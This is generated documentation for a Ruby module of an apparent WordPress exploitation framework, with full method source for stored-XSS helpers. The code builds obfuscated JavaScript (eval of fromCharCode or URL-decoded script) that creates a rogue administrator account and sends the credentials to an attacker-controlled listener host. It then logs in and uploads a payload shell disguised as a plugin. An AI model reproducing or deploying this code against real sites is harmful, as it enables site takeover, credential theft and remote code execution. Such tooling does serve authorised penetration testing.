module Wpxf::WordPress::Xss

Provides helper methods for generating scripts for XSS attacks.

Public Class Methods

new() click to toggle source

Initialize a new instance of {Xss}.

Calls superclass method Wpxf::Net::HttpServer::new
# File lib/wpxf/wordpress/xss.rb, line 13
def initialize
  super
  @success = false

  _update_info_without_validation(
    desc: %(
      This module stores a script which will be executed when
      an admin user visits the vulnerable page. Execution of the script
      will create a new admin user which will be used to upload
      and execute the selected payload in the context of the
      web server.
    )
  )

  register_options([
    StringOption.new(
      name: 'xss_host',
      desc: 'The address of the host listening for a connection',
      required: true
    ),
    StringOption.new(
      name: 'xss_path',
      desc: 'The path to access via the cross-site request',
      default: Utility::Text.rand_alpha(8),
      required: true
    )
  ])
end

Public Instance Methods

on_http_request(path, params, headers) click to toggle source

Default HTTP request handler for XSS modules which will serve the script required to create new administrator users and upload a payload shell. @param path [String] the path requested. @param params [Hash] the query string parameters. @param headers [Hash] the HTTP headers. @return [String] the response body to send to the client.

# File lib/wpxf/wordpress/xss.rb, line 106
def on_http_request(path, params, headers)
  if params['u'] && params['p']
    emit_success "Created a new administrator user, #{params['u']}:#{params['p']}"
    store_credentials params['u'], params['p']
    stop_http_server

    # Set this for #run to pick up to determine success state
    @success = upload_shell(params['u'], params['p'])

    ''
  else
    emit_info 'Incoming request received, serving JavaScript...'
    wordpress_js_create_user
  end
end
upload_shell(username, password) click to toggle source

Upload the selected payload as a WordPress plugin. @param username [String] the username to authenticate with. @param password [String] the password to authenticate with. @return [Boolean] true if successful.

# File lib/wpxf/wordpress/xss.rb, line 126
def upload_shell(username, password)
  cookie = authenticate_with_wordpress(username, password)
  return false unless cookie

  plugin_name = Utility::Text.rand_alpha(10)
  payload_name = Utility::Text.rand_alpha(10)

  emit_info 'Uploading payload...'
  res = upload_payload_as_plugin_and_execute(plugin_name, payload_name, cookie)

  !res.nil?
end
wordpress_js_create_user() click to toggle source

@return [String] a script that will create a new admin user and post the

credentials back to {#xss_url}.
# File lib/wpxf/wordpress/xss.rb, line 82
def wordpress_js_create_user
  variables = {
    '$wordpress_url_new_user' => wordpress_url_new_user,
    '$username' => Utility::Text.rand_alpha(6),
    '$password' => "#{Utility::Text.rand_alphanumeric(10)}!",
    '$email' => "#{Utility::Text.rand_alpha(7)}@#{Utility::Text.rand_alpha(10)}.com",
    '$xss_url' => xss_url
  }

  create_user_script = Wpxf::DataFile.new('js', 'create_wp_user.js')

  %(
    #{js_ajax_download}
    #{js_ajax_post}
    #{create_user_script.content_with_named_vars(variables)}
  )
end
xss_ascii_encoded_include_script() click to toggle source

@return [String] a script that includes the user creation JavaScript

without any spaces or quotation marks in the script that may be
escaped by the likes of magic-quotes.
# File lib/wpxf/wordpress/xss.rb, line 71
def xss_ascii_encoded_include_script
  "eval(String.fromCharCode(#{xss_include_script.bytes.join(',')}))"
end
xss_host() click to toggle source

@return [String] the address of the host listening for a conneciton.

# File lib/wpxf/wordpress/xss.rb, line 43
def xss_host
  normalized_option_value('xss_host')
end
xss_include_script() click to toggle source

@return [String] a script that includes the user creation JavaScript.

# File lib/wpxf/wordpress/xss.rb, line 58
def xss_include_script
  script = [
    'var a = document.createElement("script");',
    "a.setAttribute(\"src\", \"#{xss_url}\");",
    'document.head.appendChild(a);'
  ].join

  "eval(decodeURIComponent(/#{url_encode(script)}/.source))"
end
xss_path() click to toggle source

@return [String] the path to make cross-site requests to.

# File lib/wpxf/wordpress/xss.rb, line 48
def xss_path
  normalized_option_value('xss_path')
end
xss_shell_success() click to toggle source

@return [Boolean] true if the XSS shell upload was successful.

# File lib/wpxf/wordpress/xss.rb, line 140
def xss_shell_success
  @success
end
xss_url() click to toggle source

@return [String] the full URL to make cross-site requests to.

# File lib/wpxf/wordpress/xss.rb, line 53
def xss_url
  "http://#{xss_host}:#{http_server_bind_port}/#{xss_path}"
end
xss_url_and_ascii_encoded_include_script() click to toggle source

@return [String] the URL encoded value of xss_ascii_encoded_include_script.

# File lib/wpxf/wordpress/xss.rb, line 76
def xss_url_and_ascii_encoded_include_script
  url_encode(xss_ascii_encoded_include_script)
end